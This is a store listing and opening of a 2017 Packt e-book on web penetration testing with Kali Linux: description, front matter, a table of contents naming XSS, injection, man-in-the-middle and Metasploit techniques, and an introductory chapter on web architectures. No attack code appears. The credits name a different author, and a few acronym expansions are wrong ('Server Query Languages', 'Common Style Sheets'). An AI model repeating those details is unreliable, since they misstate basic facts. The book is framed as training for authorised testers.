Mastering Kali Linux for Web Penetration Testing - Michael McPhee - E-Book

Mastering Kali Linux for Web Penetration Testing E-Book

Michael McPhee

0,0
45,59 €

-100%
Sammeln Sie Punkte in unserem Gutscheinprogramm und kaufen Sie E-Books und Hörbücher mit bis zu 100% Rabatt.

Mehr erfahren.
Beschreibung

Master the art of exploiting advanced web penetration techniques with Kali Linux 2016.2

About This Book

  • Make the most out of advanced web pen-testing techniques using Kali Linux 2016.2
  • Explore how Stored (a.k.a. Persistent) XSS attacks work and how to take advantage of them
  • Learn to secure your application by performing advanced web based attacks.
  • Bypass internet security to traverse from the web to a private network.

Who This Book Is For

This book targets IT pen testers, security consultants, and ethical hackers who want to expand their knowledge and gain expertise on advanced web penetration techniques. Prior knowledge of penetration testing would be beneficial.

What You Will Learn

  • Establish a fully-featured sandbox for test rehearsal and risk-free investigation of applications
  • Enlist open-source information to get a head-start on enumerating account credentials, mapping potential dependencies, and discovering unintended backdoors and exposed information
  • Map, scan, and spider web applications using nmap/zenmap, nikto, arachni, webscarab, w3af, and NetCat for more accurate characterization
  • Proxy web transactions through tools such as Burp Suite, OWASP's ZAP tool, and Vega to uncover application weaknesses and manipulate responses
  • Deploy SQL injection, cross-site scripting, Java vulnerabilities, and overflow attacks using Burp Suite, websploit, and SQLMap to test application robustness
  • Evaluate and test identity, authentication, and authorization schemes and sniff out weak cryptography before the black hats do

In Detail

You will start by delving into some common web application architectures in use, both in private and public cloud instances. You will also learn about the most common frameworks for testing, such as OWASP OGT version 4, and how to use them to guide your efforts. In the next section, you will be introduced to web pentesting with core tools and you will also see how to make web applications more secure through rigorous penetration tests using advanced features in open source tools. The book will then show you how to better hone your web pentesting skills in safe environments that can ensure low-risk experimentation with the powerful tools and features in Kali Linux that go beyond a typical script-kiddie approach. After establishing how to test these powerful tools safely, you will understand how to better identify vulnerabilities, position and deploy exploits, compromise authentication and authorization, and test the resilience and exposure applications possess.

By the end of this book, you will be well-versed with the web service architecture to identify and evade various protection mechanisms that are used on the Web today. You will leave this book with a greater mastery of essential test techniques needed to verify the secure design, development, and operation of your customers' web applications.

Style and approach

An advanced-level guide filled with real-world examples that will help you take your web application's security to the next level by using Kali Linux 2016.2.

Sie lesen das E-Book in den Legimi-Apps auf:

Android
iOS
von Legimi
zertifizierten E-Readern

Seitenzahl: 384

Veröffentlichungsjahr: 2017

Bewertungen
0,0
0
0
0
0
0
Mehr Informationen
Mehr Informationen
Legimi prüft nicht, ob Rezensionen von Nutzern stammen, die den betreffenden Titel tatsächlich gekauft oder gelesen/gehört haben. Wir entfernen aber gefälschte Rezensionen.



 

Mastering Kali Linux for Web Penetration Testing

 

 

 

 

 

 

 

 

 

 

Test and evaluate all aspects of the design and implementation

 

 

 

 

 

 

 

 

 

 

Michael McPhee

 

 

 

 

 

 

 

BIRMINGHAM - MUMBAI

Mastering Kali Linux for Web Penetration Testing

 

 

Copyright © 2017 Packt Publishing

 

 

 

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

 

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing, and its dealers and distributors will be held liable for any damages caused or alleged to be caused directly or indirectly by this book.

 

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

 

First published: June 2017

 

Production reference: 1230617

Published by Packt Publishing Ltd.
Livery Place
35 Livery Street
Birmingham
B3 2PB, UK.

ISBN 978-1-78439-507-0

 

www.packtpub.com

Credits

Author  

Gerard Johansen

Copy Editor  

Safis Editing

Reviewers  

 

Nicole Stoneman

Project Coordinator  

Judie Jose

Commissioning Editor  

Vijin Boricha

Proofreader  

Safis Editing

Acquisition Editor  

Rahul Nair

Indexer  

Aishwarya Gangawane

Content Development Editor  

Abhishek Jadhav

Graphics  

Kirk D'Penha

Technical Editor  

Manish Shanbhag

Production Coordinator  

Aparna Bhagat

 

About the Author

Michael McPhee is a systems engineer at Cisco in New York, where he has worked for the last 4 years and has focused on cyber security, switching, and routing. Mike’s current role sees him consulting on security and network infrastructures, and he frequently runs clinics and delivers training to help get his customers up to speed. Suffering from a learning addiction, Mike has obtained the following certifications along the way: CEH, CCIE R&S, CCIE Security, CCIP, CCDP, ITILv3, and the Cisco Security White Belt. He is currently working on his VCP6-DV certification, following his kids to soccer games and tournaments, traveling with his wife and kids to as many places as possible, and scouting out his future all-grain beer home brewing rig. He also spends considerable time breaking his home network (for science!), much to the family's dismay.

Prior to joining Cisco, Mike spent 6 years in the U.S. Navy and another 10 working on communications systems as a systems engineer and architect for defense contractors, where he helped propose, design, and develop secure command and control networks and electronic warfare systems for the US DoD and NATO allies.

Prior publication:

Penetration Testing with the Raspberry Pi – Second Edition (with Jason Beltrame), Packt Publishing, November 2016.

 

To the Packt folks--thank you again for the support and for getting this book off the ground! I am blessed with the coolest team at my day job, where I receive a ton of support in pursuing all these extracurricular activities. The camaraderie from Eric Schickler and the awesome support of my manager, Mike Kamm, are especially helpful in keeping me on track and balancing my workload. In addition to my local teammates, any time I can get with my good friends, Jason Beltrame and Dave Frohnapfel, is the highlight of my week, and they have been a huge help in getting the gumption to tackle this topic. I’m lucky to have learned security at the feet of some awesome teachers, especially Mark Cairns, Bob Perciaccante, and Corey Schultz. For reasons that defy logic, Joey Muniz still sticks his neck out to support me, and I am forever in his debt--thanks dude! Lastly, I need to thank my family. Mom, you pretend to know what I am talking about and let me fortify your home network, thanks for always being so supportive. Liam and Claire--you two give me hope for the future. Keep asking questions, making jokes, and making us proud! Lastly, my beautiful wife, Cathy, keeps me healthy and happy despite myself, and the best anyone can hope for is to find a friend and partner as amazing as she is.

About the Reviewers

Aamir Lakhani is a leading senior security strategist. He is responsible for providing IT security solutions to major enterprises and government organizations.

Mr. Lakhani creates technical security strategies and leads security implementation projects for Fortune 500 companies. Industries of focus include healthcare providers, educational institutions, financial institutions, and government organizations. He has also assisted organizations in safeguarding IT and physical environments from attacks perpetrated by underground cybercrime groups. Mr. Lakhani is considered to an industry leader for creating detailed security architectures within complex computing environments. His areas of expertise include cyber defense, mobile application threats, malware management, Advanced Persistent Threat (APT) research, and investigations relating to the internet's dark security movement. He is the author of or contributor to several books, and has appeared on FOX Business News, National Public Radio, and other media outlets as an expert on cyber security.

 

It was my pleasure working with the author and reviewing this book! They worked hard in putting together a quality product I will easily recommend. I also want to thank my dad and mom, Mahmood and Nasreen Lakhani, for always encouraging me to be my best. Thank you for always believing in me.

 

 

 

DaveFrohnapfel has over 10 years of experience in the engineering field and his diverse background includes experience with a service provider, global enterprise, and engineering design for a hardware manufacturer. In his current role at Cisco Systems, he is a leader in network security. Moreover, he is passionate about helping organizations address the evolving threat landscape and focusing on game-changing technology solutions. Before Cisco, he had extensive enterprise experience in building and maintaining large data centers and service delivery networks, and he managed an international operations staff.

www.PacktPub.com

For support files and downloads related to your book, please visit www.PacktPub.com.

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.PacktPub.comand as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.

At www.PacktPub.com, you can also read a collection of free technical articles, sign up for a range of free newsletters and receive exclusive discounts and offers on Packt books and eBooks.

 

 

https://www.packtpub.com/mapt

 

Get the most in-demand software skills with Mapt. Mapt gives you full access to all Packt books and video courses, as well as industry-leading tools to help you plan your personal development and advance your career.

Why subscribe?

Fully searchable across every book published by Packt

Copy and paste, print, and bookmark content

On demand and accessible via a web browser

Customer Feedback

Thanks for purchasing this Packt book. At Packt, quality is at the heart of our editorial process. To help us improve, please leave us an honest review on this book's Amazon page at https://www.amazon.com/dp/1784395072.

 

If you'd like to join our team of regular reviewers, you can e-mail us at [email protected]. We award our regular reviewers with free eBooks and videos in exchange for their valuable feedback. Help us be relentless in improving our products!

Table of Contents

Preface

What this book covers

What you need for this book

Who this book is for

Conventions

Reader feedback

Customer support

Downloading the example code

Downloading the color images of this book

Errata

Piracy

Questions

Common Web Applications and Architectures

Common architectures

Standalone models

Three-tier models

Model-View-Controller design

Web application hosting

Physical hosting

Virtual hosting

Cloud hosting

Containers – a new trend

Application development cycles

Coordinating with development teams

Post deployment - continued vigilance

Common weaknesses – where to start

Web application defenses

Standard defensive elements

Additional layers

Summary

Guidelines for Preparation and Testing

Picking your favorite testing framework

Frameworks through a product

Train like you play

The EC-Council approach

The GIAC/SANS approach

The Offensive Security approach

Open source methodologies and frameworks

ISECOM's OSSTMM

ISSAF

NIST publications

OWASP's OTG

Keeping it legal and ethical

What is legal?

What is ethical?

Labbing - practicing what we learn

Creating a virtualized environment

Our penetration testing host

Creating a target-rich environment

Finding gullible servers

Unwitting clients

Summary

Stalking Prey Through Target Recon

The imitation game

Making (then smashing) a mirror with HTTrack

Making a stealthy initial archive

Tuning stealthier archives

Is the mirror complete and up-to-date?

Touring the target environment

Open source awesomeness

Open source Intel with Google and the Google hacking database

Tuning your Google search skills

Work smarter with the Google hacking DB and Netcraft

Mastering your own domain

Digging up the dirt

Digging record types

Getting fierce

Next steps with Nikto

Employing Maltego to organize

Being social with your target

Summary

Scanning for Vulnerabilities with Arachni

Walking into spider webs

Optimal Arachni deployment tips

An encore for stacks and frameworks

The Arachni test scenario

Profiles for efficiency

Creating a new profile

Scoping and auditing options

Converting social engineering into user input and mobile platform emulation

Fingerprinting and determining platforms

Checks (please)

Plugging into Arachni extensions and third-party add-ons

Browser clusters

Kicking off our custom scan

Reviewing the results

Summary

Proxy Operations with OWASP ZAP and Burp Suite

Pulling back the curtain with ZAP

Quick refresher on launching ZAP scans

Going active with ZAP

Passive ZAP scanning

Getting fuzzy with ZAP

Taking it to a new level with Burp Suite

Recon with Burp Suite

Stay on target!

Getting particular with proxy

Going active with Spider

Activating Burp Suite

Scanning for life (or vulnerabilities)

Passive scans are a no brainer

Active scanning – Use with care!

The flight of the intruder

Stop, enumerate, and listen!

Select, attack, highlight, and repeat!

Summary

Infiltrating Sessions via Cross-Site Scripting

The low-down on XSS types

Should XSS stay or should it go?

Location, location, and location!

XSS targeting and the delivery

Seeing is believing

Don't run with XSSer(s)!

Stored XSS with BeEF

Here, phishy phishy!

Let's go Metasploiting

Building your own payload

Every good payload needs a handler

Seal the deal – Delivering shell access

Metasploit's web-focused cousin – Websploit

Summary

Injection and Overflow Testing

Injecting some fun into your testing

Is SQL any good?

A crash course in DBs gone bad

Types of SQLI

In-band or classic SQLI

Blind SQLI

Stacked or compound SQLI

SQLI tool school

Old-school SQLI via browsers

Stepping it up with SQLMap

Cooking up some menu-driven SQLI with BBQSQL

SQLI goes high-class with Oracle

The X-factor - XML and XPath injections

XML injection

XPath injection

Credential Jedi mind tricks

Going beyond persuasion – Injecting for execution

Code injections

Overflowing fun

Commix - Not-so-funny command injections

Down with HTTP?

Summary

Exploiting Trust Through Cryptography Testing

How secret is your secret?

Assessing encryption like a pro

SSLyze - it slices, it scans…

SSLscan can do it!

Nmap has SSL skills too

Exploiting the flaws

POODLE – all bark, no bite (usually)

Heartbleed-ing out

DROWNing HTTPS

Revisiting the classics

Hanging out as the Man-in-the-Middle

Scraping creds with SSLstrip

Looking legit with SSLsniff and SSLsplit

SSLsniff

SSLsplit

Alternate MITM motives

Summary

Stress Testing Authentication and Session Management

Knock knock, who's there?

Does authentication have to be hard?

Authentication 2.0 - grabbing a golden ticket

The basic authentication

Form-based authentication

Digest-based authentication

Trust but verify

This is the session you are looking for

Munching on some cookies?

Don't eat fuzzy cookies

Jedi session tricks

Functional access level control

Refining a brute's vocabulary

Summary

Launching Client-Side Attacks

Why are clients so weak?

DOM, Duh-DOM DOM DOM!!

Malicious misdirection

Catch me if you can!

Picking on the little guys

Sea-surfing on someone else's board

Simple account takeovers

Don't you know who I am? Account creation

Trust me, I know the way!

I don't need your validation

Trendy hacks come and go

Clickjacking (bWAPP)

Punycode

Forged or hijacked certificates

Summary

Breaking the Application Logic

Speed-dating your target

Cashing in with e-commerce

Financial applications - Show me the money

Hacking human resources

Easter eggs of evil

So many apps to choose from…

Functional Feng Shui

Basic validation checks

Sometimes, less is more?

Forgery shenanigans

What does this button do?

Timing is everything

Reaching your functional limits

Do we dare to accept files?

Summary

Educating the Customer and Finishing Up

Finishing up

Avoiding surprises with constant contact

Establishing periodic updates

When to hit the big red button

Weaving optimism with your action plan

The executive summary

Introduction

Highlights, scoring, and risk recap

More on risk

Guidance - earning your keep

Detailed findings

The Dradis framework

MagicTree

Other documentation and organization tools

Graphics for your reports

Bringing best practices

Baking in security

Honing the SDLC

Role-play - enabling the team

Picking a winner

Plans and programs

More on change management

Automate and adapt

Assessing the competition

Backbox Linux

Samurai web testing framework

Fedora Security Spin

Other Linux pen test distros

What About Windows and macOS?

Summary

Preface

Web applications are where customers and businesses meet. On the internet, a very large proportion of the traffic is now between servers and clients, and the power and trust placed in each application while exposing them to the outside world makes them a popular target for adversaries to steal, eavesdrop, or cripple businesses and institutions. As penetration testers, we need to think like the attacker to better understand, test, and make recommendations for the improvement of those web apps. There are many tools to fit any budget, but Kali Linux is a fantastic and industry-leading open source distribution that can facilitate many of these functions for free. Tools Kali provides, along with standard browsers and appropriate plugins, enable us to tackle most web penetration testing scenarios. Several organizations provide wonderful training environments that can be paired with a Kali pen testing box to train and hone their web pen testing skills in safe environments. These can ensure low-risk experimentation with powerful tools and features in Kali Linux that go beyond a typical script-kiddie approach. This approach assists ethical hackers in responsibly exposing, identifying, and disclosing weaknesses and flaws in web applications at all stages of development. One can safely test using these powerful tools, understand how to better identify vulnerabilities, position and deploy exploits, compromise authentication and authorization, and test the resilience and exposure applications possess. At the end, the customers will be better served with actionable intelligence and guidance that will help them secure their application and better protect their users, information, and intellectual property.

What this book covers

Chapter 1, Common Web Applications and Architectures, reviews some common web application architectures and hosting paradigms to help us identify the potential weaknesses and select the appropriate test plan.

Chapter 2, Guidelines for Preparation and Testing, helps us understand the many sources of requirements for our testing (ethical, legal, and regulatory) and how to select the appropriate testing methodology for a scenario or customer.

Chapter 3, Stalking Prey Through Target Recon, introduces open source intelligence gathering and passive recon methods to help map out a target and its attack surface.

Chapter 4, Scanning for Vulnerabilities with Arachni, discusses one of the purpose-built vulnerability scanners included in Kali that can help us conduct scans of even the largest applications and build fantastic reports.

Chapter 5, Proxy Operations with OWASP ZAP and Burp Suite, dives into proxy-based tools to show how they can not only actively scan, but passively intercept and manipulate messages to exploit many vulnerabilities.

Chapter 6, Infiltrating Sessions via Cross-Site Scripting, explores how we can test and implement Cross Site Scripting (XSS) to both compromise the client and manipulate the information flows for other attacks. Tools such as BeEF, XSSer, Websploit, and Metasploit are discussed in this chapter.

Chapter 7, Injection and Overflow Testing, looks into how we can test for various forms of unvalidated input (for example, SQL, XML, LDAP, and HTTP) that have the potential to reveal inappropriate information, escalate privileges, or otherwise damage an application's servers or modules. We'll see how Commix, BBQSQL, SQLMap, SQLninja, and SQLsus can help.

Chapter 8, Exploiting Trust Through Cryptography Testing, helps us see how we can tackle testing the strength that encryption applications may be using to protect the integrity and privacy of their communications with clients. Our tools of interest will be SSLstrip, SSLScan, SSLsplit, SSLyze, and SSLsniff.

Chapter 9, Stress Testing Authentication and Session Management, tackles the testing of various vulnerabilities and schemes focused on how web apps determine who is who and what they are entitled to see or access. Burp will be the primary tool of interest.

Chapter 10, Launching Client-Side Attacks, focuses on how to test for vulnerabilities (CSRF, DOM-XSS, and so on) that allow attackers to actually compromise a client and either steal its information or alter its behavior, as the earlier chapters dealt with how to test the servers and applications themselves. JavaScript and other forms of implant will be the focus.

Chapter 11, Breaking the Application Logic, explains how to test for a variety of flaws in the business logic of an application. Important as it is, it requires significant understanding of what the app is intending and how it is implemented.

Chapter 12, Educating the Customer and Finishing Up, wraps up the book with a look at providing useful and well-organized guidance and insights to the customer. This chapter also looks at complementary or alternate toolsets worth a look.

What you need for this book

Hardware list:

The exercises performed in this book and the tools used can be deployed on any modern Windows, Linux, or Mac OS machine capable of running a suitable virtualization platform and a more recent version of the OS. Suggested minimum requirements should allow for at least the following resources to be available to your virtual platforms:

4 virtual CPUs

4-8 GB of RAM

802.3 Gigabit Ethernet, shared with host machine

802.11a/g/n/ac WiFi link, shared with host machine

Software list:

Desktop/Laptop Core OS and Hypervisor:

Virtualization should be provided by one of Kali Linux's supported hypervisors, namely one of the following options. The operating system and hardware will need to support the minimum requirements, with an eye toward dedicating the previous hardware recommendations to the guest virtual machines:

For Windows:

VMware Workstation Pro 12 or newer (Player does not support multiple VMs at a time)--

http://www.vmware.com/products/workstation.html

VirtualBox 5.1 or newer--

https://www.virtualbox.org/wiki/Downloads

For Mac OS:

VMware Fusion 7.X or newer--

http://www.vmware.com/products/fusion.html

Parallels 12 for Mac--

http://www.parallels.com/products/desktop/

VirtualBox 5.1 or newer--

https://www.virtualbox.org/wiki/Downloads

For Linux:

VMWare Workstation 12 or newer (Player does not support multiple VMs at a time)--

http://www.vmware.com/products/workstation-for-linux.html

VirtualBox 5.1 or newer--

https://www.virtualbox.org/wiki/Downloads

For Barebones Hypervisors:

VMware ESXi/vSphere 5.5 or newer

Microsoft Hyper-V 2016

Redhat KVM/sVirt 5 or newer

Applications and virtual machines:

Essential:

Kali Linux VM (choose 64-bit VM, Vbox, or Hyper-V image)--

https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

Alternatives:

Kali Linux ISO (64 bit, for Virtual-Box or Parallels)--

https://www.kali.org/downloads/

Target VMs:

OWASP Broken Web Application:

https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

Metasploitable 2--

https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Metasploitable 3--

https://community.rapid7.com/community/metasploit/blog/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3

Bee Box--

http://www.itsecgames.com

Damn Vulnerable Web Application (DVWA)--

http://www.dvwa.co.uk

OWASP Mutillidae 2--

https://sourceforge.net/projects/mutillidae/files/

Windows Eval Mode OS + Browser--

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Who this book is for

This book is focused on IT pentesters, security consultants, and ethical hackers who want to expand their knowledge and gain expertise on advanced web penetration techniques. Prior knowledge of penetration testing will be beneficial.

Reader feedback

Feedback from our readers is always welcome. Let us know what you think about this book-what you liked or disliked. Reader feedback is important for us as it helps us develop titles that you will really get the most out of.

To send us general feedback, simply e-mail [email protected], and mention the book's title in the subject of your message.

If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, see our author guide at www.packtpub.com/authors.

Customer support

Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most from your purchase.

Downloading the example code

You can download the example code files for this book from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.

You can download the code files by following these steps:

Log in or register to our website using your e-mail address and password.

Hover the mouse pointer on the

SUPPORT

tab at the top.

Click on

Code Downloads & Errata

.

Enter the name of the book in the

Search

box.

Select the book for which you're looking to download the code files.

Choose from the drop-down menu where you purchased this book from.

Click on

Code Download

.

Once the file is downloaded, please make sure that you unzip or extract the folder using the latest version of:

WinRAR / 7-Zip for Windows

Zipeg / iZip / UnRarX for Mac

7-Zip / PeaZip for Linux

The code bundle for the book is also hosted on GitHub at https://github.com/PacktPublishing/Mastering-Kali-Linux-for-Web-Penetration-Testing. We also have other code bundles from our rich catalog of books and videos available at https://github.com/PacktPublishing/. Check them out!

Downloading the color images of this book

We also provide you with a PDF file that has color images of the screenshots/diagrams used in this book. The color images will help you better understand the changes in the output. You can download this file from https://www.packtpub.com/sites/default/files/downloads/MasteringKaliLinuxforWebPenetrationTesting_ColorImages.pdf.

Errata

Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find a mistake in one of our books-maybe a mistake in the text or the code-we would be grateful if you could report this to us. By doing so, you can save other readers from frustration and help us improve subsequent versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details of your errata. Once your errata are verified, your submission will be accepted and the errata will be uploaded to our website or added to any list of existing errata under the Errata section of that title.

To view the previously submitted errata, go to https://www.packtpub.com/books/content/support and enter the name of the book in the search field. The required information will appear under the Errata section.

Piracy

Piracy of copyrighted material on the Internet is an ongoing problem across all media. At Packt, we take the protection of our copyright and licenses very seriously. If you come across any illegal copies of our works in any form on the Internet, please provide us with the location address or website name immediately so that we can pursue a remedy.

Please contact us at [email protected] with a link to the suspected pirated material.

We appreciate your help in protecting our authors and our ability to bring you valuable content.

Questions

If you have a problem with any aspect of this book, you can contact us at [email protected], and we will do our best to address the problem.

Common Web Applications and Architectures

Web applications are essential for today's civilization. I know this sounds bold, but when you think of how the technology has changed the world, there is no doubt that globalization is responsible for the rapid exchange of information across great distances via the internet in large parts of the world. While the internet is many things, the most inherently valuable components are those where data resides. Since the advent of the World Wide Web in the 1990s, this data has exploded, with the world currently generating more data in the next 2 years than in all of the recorded history. While databases and object storage are the main repositories for this staggering amount of data, web applications are the portals through which that data comes and goes is manipulated, and processed into actionable information. This information is presented to the end users dynamically in their browser, and the relative simplicity and access that this imbues are the leading reason why web applications are impossible to avoid. We're so accustomed to web applications that many of us would find it impossible to go more than a few hours without them.

Financial, manufacturing, government, defense, businesses, educational, and entertainment institutions are dependent on the web applications that allow them to function and interact with each other. These ubiquitous portals are trusted to store, process, exchange, and present all sorts of sensitive information and valuable data while safeguarding it from harm. the industrial world has placed a great deal of trust in these systems. So, any damage to these systems or any kind of trust violation can and often does cause far-reaching economic, political, or physical damage and can even lead to loss of life. The news is riddled with breaking news of compromised web applications every day. Each of these attacks results in loss of that trust as data (from financial and health information to intellectual property) is stolen, leaked, abused, and disclosed. Companies have been irreparably harmed, patients endangered, careers ended, and destinies altered. This is heavy stuff!

While there are many potential issues that keep architects, developers, and operators on edge, many of these have a very low probability of occurring – with one great exception. Criminal and geopolitical actors and activists present a clear danger to computing systems, networks, and all other people or things that are attached to or make use of them. Bad coding, improper implementation, or missing countermeasures are a boon to these adversaries, offering a way in or providing cover for their activities. As potential attackers see the opportunity to wreak havoc, they invest more, educate themselves, develop new techniques, and then achieve more ambitious goals. This cycle repeats itself. Defending networks, systems, and applications against these threats is a noble cause.

Defensive approaches also exist that can help reduce risks and minimize exposure, but it is the penetration tester (also known as the White Hat Hacker) that ensures that they are up to the task. By thinking like an attacker - and using many of the same tools and techniques - a pen tester can uncover latent flaws in the design or implementation and allow the application stakeholders to fill these gaps before the malicious hacker (also known as the Black Hat Hacker) can take advantage of them. Security is a journey, not a destination, and the pen tester can be the guide leading the rest of the stakeholders to safety.

In this book, I'll assume that you are an interested or experienced penetration tester who wants to specifically test web applications using Kali Linux, the most popular open source penetration testing platform today. The basic setup and installation of Kali Linux and its tools is covered in many other places, be it Packt's own Web Penetration Testing with Kali Linux - Second Edition (by Juned Ahmed Ansari, available at https://www.packtpub.com/networking-and-servers/web-penetration-testing-kali-linux-second-edition) or one of a large number of books and websites.

In this first chapter, we'll take a look at the following:

Leading web application architectures and trends

Common web application platforms

Cloud and privately hosted solutions

Common defenses

A high-level view of architectural soft-spots which we will evaluate as we progress through this book

Common architectures

Web applications have evolved greatly over the last 15 years, emerging from their early monolithic designs to segmented approaches, which in more professionally deployed instances dominate the market now. They have also seen a shift in how these elements of architecture are hosted, from purely on-premise servers, to virtualized instances, to now pure or hybrid cloud deployments. We should also understand that the clients' role in this architecture can vary greatly. This evolution has improved scale and availability, but the additional complexity and variability involved can work against less diligent developers and operators.

The overall web application's architecture maybe physically, logically, or functionally segmented. These types of segmentation may occur in combinations; with the cross-application integration so prevalent in enterprises, it is likely that these boundaries or characteristics are always in a state of transition. This segmentation serves to improve scalability and modularity, split management domains to match the personnel or team structure, increase availability, and can also offer some much-needed segmentation to assist in the event of a compromise. The degree to which this modularity occurs and how the functions are divided logically and physically is greatly dependent on the framework that is used.

Let's discuss some of the more commonly used logical models as well as some of the standout frameworks that these models are implemented on.

Standalone models

Most small or ad hoc web applications at some point or another were hosted on a physical or virtual server and within a single monolithic installation, and this is commonly encountered in simpler self-hosted applications such as a small or medium business web page, inventory service, ticketing systems, and so on. As these applications or their associated databases grow, it becomes necessary to separate the components or modules to better support the scale and integrate with adjacent applications and data stores.

These applications tend to use commonly available turnkey web frameworks such as Drupal, WordPress, Joomla!, Django, or a multitude of other frameworks, each of which includes a content delivery manager and language platform (for example Java, PHP: Hypertext Pre-Processor (PHP), Active Server Pages (ASP.NET), and so on), generated content in Hyper Text Markup Language (HTML), and a database type or types they support (various Server Query Languages (SQLs), Oracle, IBM DB2, or even flat files and Microsoft Access databases). Available as a single image or install medium, all functions reside within the same operating system and memory space. The platform and database combinations selected for this model are often more a question of developer competencies and preferences than anything else. Social engineering and open source information gathering on the responsible teams will certainly assist in characterizing the architecture of the web application.

A simple single-tier or standalone architecture is shown here in the following figure:

The standalone architecture was the first encountered historically, and often a first step in any application's evolution.

Three-tier models

Conceptually, the three-tier design is still used as a reference model, even if most applications have migrated to other topologies or have yet to evolve from a standalone implementation. While many applications now stray from this classic model, we still find it useful for understanding the basic facilities needed for real-world applications. We call it a three-tier model but it also assumes a fourth unnamed component: the client.

The three tiers include the web tier (or front end), the application tier, and the database tier, as seen here: in the following figure:

The Three Tier Architecture provides greater scalability and specialization that modern enterprise applications require.

The role of each tier is important to consider:

Web or Presentation Tier/Server/Front End

: This module provides the

User Interface

(

UI

), authentication and authorization, scaling provisions to accommodate the large number of users, high availability features (to handle load shifting, content caching, and fault tolerance), and any software service that must be provisioned for the client or is used to communicate with the client. HTML,

eXtensible Markup Language

(

XML

),

Asynchronous JavaScript And XML

(

AJAX

),

Common Style Sheets

(

CSS

), JavaScript, Flash, other presented content, and UI components all reside in this tier, which is commonly hosted by Apache, IBM WebSphere, or Microsoft IIS. In effect, this tier is what the users see through their browser and interact with to request and receive their desired outcomes.

Application or Business Tier/Server

: This is the engine of the web application. Requests fielded by the web tier are acted upon here, and this is where business logic, processes, or algorithms reside. This tier also acts as a bridge module to multiple databases or even other applications, either within the same organization or with trusted third parties. C/C++, Java, Ruby, and PHP are usually the languages used to do the heavy lifting and turn raw data from the database tier into the information that the web tier presents to the client.

The Database Tier/Server

: Massive amounts of data of all forms is stored in specialized systems called databases. These troves of information are arranged so they can be quickly accessed but continually scaled. Classic SQL implementations such as MySQL and ProstgreSQL, Redis, CouchDB, Oracle, and others are common for storing the data, along with a large variety of abstraction tools helping to organize and access that data. At the higher end of data collection and processing, there are a growing number of superscalar database architectures that involve

Not Only SQL

(

NoSQL

), which is coupled with database abstraction software such as Hadoop. These are commonly found in anything that claims to be

Big Data

or

Data Analytics

, such as Facebook, Google, NASA, and so on.

The Client:

All of the three tiers need an audience, and the client (more specifically, their browser) is where users access the application and interact. The browser and its plugin software modules support the web tier in presenting the information as intended by the application developers.

The vendor takes this model and modifies it to accentuate their strengths or more closely convey their strategies. Both Oracle's and Microsoft's reference web application architectures, for instance, combine the web and application tiers into a single tier, but Oracle calls attention to its strength on the database side of things, whereas Microsoft expends considerable effort expanding on its list of complementary services that can add value to the customer (and revenue for Microsoft) to include load balancing, authentication services, and ties to its own operating systems on a majority of clients worldwide.

Model-View-Controller design

The Model-View-Controller (MVC) design is a functional model that guides the separation of information and exposure, and to some degree, also addresses the privileges of the stakeholder users through role separation. This allows the application to keep users and their inputs from intermingling with the back-end business processes, logic, and transactions that can expose earlier architectures to data leakage. The MVC design approach was actually created by thick-application software developers and is not a logical separation of services and components but rather a role-based separation. Now that web applications commonly have to scale while tracking and enforcing roles, web application developers have adapted it to their use. MVC designs also facilitate code reuse and parallel module development.

An MVC design can be seen in following figure:

The Model-View-Controller design focuses on roles, not functions, and is often combined with a functional architecture.

In the MVC design, the four components are as follows:

Model

: The model maintains and updates data objects as the source of truth for the application, possessing the rules, logic, and patterns that make the application valuable. It has no knowledge of the user, but rather receives calls from the controller to process commands against its own data objects and returns its results to both the controller and the view. Another way to look at it is that the Model determines the behavior of the application.

View

: The view is responsible for presenting the information to the user, and so, it is responsible for the content delivery and responses: taking feedback from the controller and results from the model. It frames the interface that the user views and interacts with. The view is where the user sees the application work.

Controller:

The controller acts as the central link between the view and model; in receiving input from the view's user interface, the Controller translates these input calls to requests that the model acts on. These requests can update the Model and act on the user's intent or update the View presented to the user. The controller is what makes the application interactive, allowing the outside world to stimulate the model and alter the view.

User:

As in the other earlier models, the user is an inferred

component

of the design; and indeed, the entire design will revolve around how to allow the application to deliver value to the customer.

Notice that in the MVC model, there is very little detail given about software modules, and this is intentional. By focusing on the roles and separation of duties, software (and now, web) developers were free to create their own platform and architecture while using MVC as a guide for role-based segmentation. Contrast this with the standalone or 3-tier models break down the operation of an application, and we'll see that they are thinking about the same thing in very different ways.

One thing MVC does instill is a sense of statefulness, meaning that the application needs to track session information for continuity. This continuity drove the need for HTTP cookies and tokens to track sessions, which are in themselves something our app developers should now find ways to secure. Heavy use of application programming interfaces (APIs) also mean that there is now a larger attack surface. If the application is only presenting a small portion of data stored within the database tier, or that information should be more selectively populated to avoid leaks by maintaining too much information within the model that can be accessed when misconfigured or breached. In these cases, MVC is often shunned as a methodology because it can be difficult to manage data exposure within it.

It should be noted that the MVC design approach can be combined with physical or logical models of functions; in fact, platforms that use some MVC design principles power the majority of today's web applications.

Web application hosting

The location of the application or its modules has a direct bearing on our role as penetration testers. Target applications may be anywhere on a continuum, from physical to virtual, to cloud-hosted components, or some combination of the three. Recently, a fourth possibility has arrived: containers. The continuum of hosting options and their relative scale and security attributes are shown in the following figure. Bear in mind that the dates shown here relate to the rise in popularity of each possibility, but that any of the hosting possibilities may coexist, and that containers, in fact, can be hosted just as well in either cloud or on-premise data centers.

This evolution is seen in the following figure:

